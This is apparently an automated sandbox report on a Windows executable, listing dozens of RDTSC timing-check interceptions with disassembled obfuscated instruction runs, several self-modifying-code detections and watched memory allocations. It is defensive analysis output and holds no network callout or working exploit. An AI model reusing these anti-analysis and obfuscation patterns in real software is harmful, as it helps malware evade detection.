                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0560 second address: 46B0567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 30h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0567 second address: 46B063D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC2192E858Ah 0x00000011 or ch, FFFFFFB8h 0x00000014 jmp 00007FC2192E858Bh 0x00000019 popfd 0x0000001a call 00007FC2192E8598h 0x0000001f pushfd 0x00000020 jmp 00007FC2192E8592h 0x00000025 xor cx, D148h 0x0000002a jmp 00007FC2192E858Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 popad 0x00000032 mov dword ptr [esi+10h], eax 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC2192E8595h 0x0000003c adc ecx, 3960B666h 0x00000042 jmp 00007FC2192E8591h 0x00000047 popfd 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+50h] 0x0000004c jmp 00007FC2192E858Dh 0x00000051 mov dword ptr [esi+14h], eax 0x00000054 jmp 00007FC2192E858Eh 0x00000059 mov eax, dword ptr [ebx+54h] 0x0000005c pushad 0x0000005d jmp 00007FC2192E858Eh 0x00000062 mov dx, ax 0x00000065 popad 0x00000066 mov dword ptr [esi+18h], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B063D second address: 46B0641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0641 second address: 46B0647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0647 second address: 46B06A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 popad 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007FC218F099C4h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC218F099BEh 0x00000023 jmp 00007FC218F099C5h 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b mov si, AA5Dh 0x0000002f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B06A9 second address: 46B070B instructions: 0x00000000 rdtsc 0x00000002 call 00007FC2192E858Ah 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e jmp 00007FC2192E8591h 0x00000013 mov eax, dword ptr [ebx+60h] 0x00000016 jmp 00007FC2192E858Eh 0x0000001b mov dword ptr [esi+24h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FC2192E858Dh 0x00000027 adc eax, 1FB74806h 0x0000002d jmp 00007FC2192E8591h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B070B second address: 46B0711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0711 second address: 46B0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0715 second address: 46B074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC218F099C7h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B074D second address: 46B07B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC2192E8593h 0x00000015 add si, 16AEh 0x0000001a jmp 00007FC2192E8599h 0x0000001f popfd 0x00000020 call 00007FC2192E8590h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B07B5 second address: 46B07BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B07BA second address: 46B07E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+68h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC2192E8597h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B07E9 second address: 46B0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+2Ch], eax 0x0000000d jmp 00007FC218F099C7h 0x00000012 mov ax, word ptr [ebx+6Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0817 second address: 46B081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B081B second address: 46B0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0821 second address: 46B0827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0827 second address: 46B0864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC218F099BCh 0x00000018 xor al, FFFFFFA8h 0x0000001b jmp 00007FC218F099BBh 0x00000020 popfd 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0864 second address: 46B08D1 instructions: 0x00000000 rdtsc 0x00000002 mov si, 089Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007FC2192E8591h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC2192E858Ch 0x00000020 jmp 00007FC2192E8595h 0x00000025 popfd 0x00000026 mov edx, ecx 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+0000008Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC2192E8599h 0x00000036 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B08D1 second address: 46B0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC218F099C3h 0x00000014 mov cx, 901Fh 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0904 second address: 46B0956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8595h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC2192E858Ch 0x00000013 jmp 00007FC2192E8595h 0x00000018 popfd 0x00000019 call 00007FC2192E8590h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0956 second address: 46B0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+38h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0962 second address: 46B09AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ah, 24h 0x0000000b popad 0x0000000c mov eax, dword ptr [ebx+1Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC2192E8596h 0x00000018 sub ah, FFFFFFD8h 0x0000001b jmp 00007FC2192E858Bh 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B09AE second address: 46B09F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC218F099BCh 0x00000013 xor eax, 63BCA168h 0x00000019 jmp 00007FC218F099BBh 0x0000001e popfd 0x0000001f mov cx, FB5Fh 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov dx, si 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B09F8 second address: 46B0A0C instructions: 0x00000000 rdtsc 0x00000002 mov cx, 4129h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cl, C6h 0x0000000a popad 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0A0C second address: 46B0A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0A10 second address: 46B0A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0A2A second address: 46B0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0A30 second address: 46B0A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0A34 second address: 46B0A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, 1B2C6AB1h 0x00000016 mov edi, ecx 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0A4D second address: 46B0AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3E9Ch 0x00000007 movsx ebx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 00000001h 0x0000000f jmp 00007FC2192E858Ch 0x00000014 nop 0x00000015 pushad 0x00000016 jmp 00007FC2192E858Eh 0x0000001b jmp 00007FC2192E8592h 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FC2192E858Bh 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC2192E8595h 0x0000002f rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0AAF second address: 46B0AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ecx, edx 0x00000010 pop edi 0x00000011 jmp 00007FC218F099C4h 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0AE8 second address: 46B0AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0AEC second address: 46B0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0AF2 second address: 46B0B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 2111h 0x00000007 call 00007FC2192E858Eh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC2192E858Dh 0x0000001a or esi, 2DE663D6h 0x00000020 jmp 00007FC2192E8591h 0x00000025 popfd 0x00000026 mov edx, esi 0x00000028 popad 0x00000029 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0B38 second address: 46B0B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C8h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BB7 second address: 46B0BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BBD second address: 46B0BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BC2 second address: 46B0BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC28BBD706Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BE8 second address: 46B0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BEC second address: 46B0BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BF0 second address: 46B0BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0BF6 second address: 46B0C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c jmp 00007FC2192E8590h 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0C28 second address: 46B0C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 mov ebx, 2F2FC0AAh 0x0000000d popad 0x0000000e lea eax, dword ptr [ebx+78h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC218F099BCh 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0C47 second address: 46B0C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC2192E8591h 0x00000009 jmp 00007FC2192E858Bh 0x0000000e popfd 0x0000000f mov eax, 679A184Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000001h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC2192E858Eh 0x00000022 jmp 00007FC2192E8595h 0x00000027 popfd 0x00000028 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0C9A second address: 46B0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC218F099C0h 0x00000008 and ecx, 363A5F58h 0x0000000e jmp 00007FC218F099BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007FC218F099C2h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov eax, edi 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov edx, 6108F394h 0x0000002f popad 0x00000030 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0CE8 second address: 46B0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2192E858Ah 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D07 second address: 46B0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D16 second address: 46B0D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D1C second address: 46B0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D20 second address: 46B0D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D24 second address: 46B0D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FC218F099BCh 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC218F099C7h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D55 second address: 46B0D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D5B second address: 46B0D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D8A second address: 46B0D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0D99 second address: 46B0E02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099BFh 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 mov ebx, 4D408CE0h 0x00000018 popad 0x00000019 test edi, edi 0x0000001b pushad 0x0000001c call 00007FC218F099C5h 0x00000021 pushfd 0x00000022 jmp 00007FC218F099C0h 0x00000027 jmp 00007FC218F099C5h 0x0000002c popfd 0x0000002d pop eax 0x0000002e push eax 0x0000002f push edx 0x00000030 mov bx, 71D2h 0x00000034 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0E02 second address: 46B0E61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FC28BBD6E36h 0x0000000d pushad 0x0000000e jmp 00007FC2192E858Bh 0x00000013 push ecx 0x00000014 jmp 00007FC2192E858Fh 0x00000019 pop esi 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e pushad 0x0000001f mov dx, B718h 0x00000023 jmp 00007FC2192E8591h 0x00000028 popad 0x00000029 mov dword ptr [esi+08h], eax 0x0000002c jmp 00007FC2192E858Eh 0x00000031 lea eax, dword ptr [ebx+70h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0E61 second address: 46B0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0E65 second address: 46B0E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0E6B second address: 46B0EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov si, 996Dh 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC218F099C2h 0x0000001b and esi, 6B5E8638h 0x00000021 jmp 00007FC218F099BBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FC218F099C5h 0x0000002e nop 0x0000002f jmp 00007FC218F099BEh 0x00000034 lea eax, dword ptr [ebp-18h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0EE3 second address: 46B0EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0EE7 second address: 46B0F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0F04 second address: 46B0F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC2192E8598h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B0F36 second address: 46B0F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B100B second address: 46B100F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B100F second address: 46B1015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B1015 second address: 46B1044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC2192E858Ch 0x00000009 sub ah, FFFFFFF8h 0x0000000c jmp 00007FC2192E858Bh 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, C4C3h 0x00000021 popad 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRDTSC instruction interceptor: First address: 46B11B9 second address: 46B11BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSpecial instruction interceptor: First address: 43BDE3 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSpecial instruction interceptor: First address: 5E03B5 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSpecial instruction interceptor: First address: 5E7545 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSpecial instruction interceptor: First address: 43BDDD instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSpecial instruction interceptor: First address: 6598BF instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeMemory allocated: 4710000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeMemory allocated: 4B50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeMemory allocated: 4900000 memory reserve | memory write watchJump to behavior
